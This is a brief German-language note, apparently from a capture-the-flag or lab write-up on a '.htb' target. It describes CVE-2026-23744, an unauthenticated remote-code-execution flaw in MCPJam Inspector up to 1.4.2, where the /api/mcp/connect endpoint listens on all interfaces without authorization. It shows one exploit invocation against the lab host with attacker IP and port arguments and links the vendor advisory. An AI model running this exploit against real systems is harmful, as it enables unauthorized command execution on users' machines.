
Remote-Code-Ausführung auf MCPJam Inspector <= 1.4.2
CVE-2026-23744 ist eine kritische Schwachstelle in MCPJam Inspector (Versionen <= 1.4.2), die eine nicht authentifizierte Remote Code Execution (RCE) ermöglicht. Der Fehler besteht darin, dass der interne API-Server der Anwendung standardmäßig an allen Netzwerkschnittstellen (0.0.0.0) lauscht und keine Autorisierung für den Endpunkt /api/mcp/connect besitzt. Ein Angreifer kann eine manipulierte JSON-Payload an diesen Endpunkt senden, um beliebige Befehle mit den Rechten des Benutzers auszuführen, der den Inspector ausführt.

python3 exploit.py https://mpc.kobold.htb <IP> <PORT>
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6